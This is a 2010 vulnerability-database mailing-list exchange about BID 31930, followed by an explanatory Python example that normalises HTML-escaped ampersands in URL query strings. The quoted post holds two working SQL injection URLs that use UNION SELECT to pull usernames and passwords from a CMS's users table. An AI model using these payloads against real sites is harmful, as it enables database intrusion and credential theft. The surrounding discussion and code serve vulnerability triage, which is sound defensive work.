[VIM] BID 31930 exploit

George A. Theall theall at tenable.com
Thu Nov 18 19:46:31 CST 2010


On Nov 18, 2010, at 5:10 AM, security curmudgeon wrote:

>
> http://www.securityfocus.com/bid/31930/exploit
>
> http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION 
> %20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass), 
> 0,0,0,0,0,0,0,0,0%20FROM%20default_users
>
> http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION  
> ALL SELECT 0,0,0,0,0,version()--
>
> --
>
> Just want to confirm, it appears the "&" is actually some HTML
> decoding snafu that is essentially doing & and an encoded &? Seems
> like that should be "&nid=" in the first example and "&cpage" in the
> second?

Seems to be in error in the BID -- look at the advisory on Packet  
Storm and SecurityReason:

   http://packetstormsecurity.org/files/view/71280/tandiscms-sql.txt
   http://securityreason.com/exploitalert/5013


George
-- 
theall at tenablesecurity.com
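The decoding snafu discussed in the thread (an HTML-escaped ampersand surviving inside a URL, so "&amp;nid=" reaches the parser instead of "&nid=") is easy to reproduce. The following is an added example, not code from the VIM thread or from either poster: it parses a query string as literally written, shows how the parameter names get mangled, and normalises the string by unescaping HTML entities until it stops changing, so that whatever inspects the URL next (a log-triage script, a WAF rule) sees the intended parameters. The URLs in `SAMPLE_URLS` are constructed for this example, and the function names are the example's own.

```python
# Added example (not part of the original VIM thread).
# Shows how an HTML-escaped "&" inside a URL's query string corrupts
# parameter parsing, and how to normalise the string before inspecting it.
import html
from urllib.parse import urlsplit, unquote_plus

# Constructed sample URLs: the first is as intended, the other two are what
# you get when a listing is HTML-escaped once or twice and then copied verbatim.
SAMPLE_URLS = [
    "http://www.example.com/app/index.php?mod=2&nid=5",
    "http://www.example.com/app/index.php?mod=2&amp;nid=5",
    "http://www.example.com/app/index.php?mod=2&amp;amp;nid=5",
]


def parse_query(query):
    """Split a query string on '&' only and percent-decode each pair.

    Done by hand rather than with urllib.parse.parse_qs so the behaviour is
    the same across Python versions (older versions also split on ';').
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def raw_params(url):
    """Parameters exactly as a naive copy/paste of the URL would send them."""
    return parse_query(urlsplit(url).query)


def normalise_query(url, max_rounds=5):
    """Undo repeated HTML-entity escaping of the query string.

    Loops until html.unescape makes no further change, bounded by max_rounds
    so a hostile input cannot keep the loop busy indefinitely.
    """
    query = urlsplit(url).query
    for _ in range(max_rounds):
        decoded = html.unescape(query)
        if decoded == query:
            break
        query = decoded
    return query


def normalised_params(url):
    """Parameters after HTML-entity normalisation of the query string."""
    return parse_query(normalise_query(url))


def looks_html_escaped(url):
    """Cheap triage check: a literal '&amp;' in the query is a sign of the snafu."""
    return "&amp;" in urlsplit(url).query


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url)
        print("  escaped? ", looks_html_escaped(url))
        print("  raw      ", raw_params(url))
        print("  normalised", normalised_params(url))
```

Run as written, the singly escaped URL yields a parameter literally named `amp;nid` and the doubly escaped one `amp;amp;nid`, while the normalised view of all three is `{'mod': '2', 'nid': '5'}`. One caveat when using `html.unescape` this way: it also recognises a handful of legacy entity names without a trailing semicolon (for example `&copy`), so a parameter genuinely named `copy` would be mangled; if that matters for your data, restrict the normaliser to replacing `&amp;` alone.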




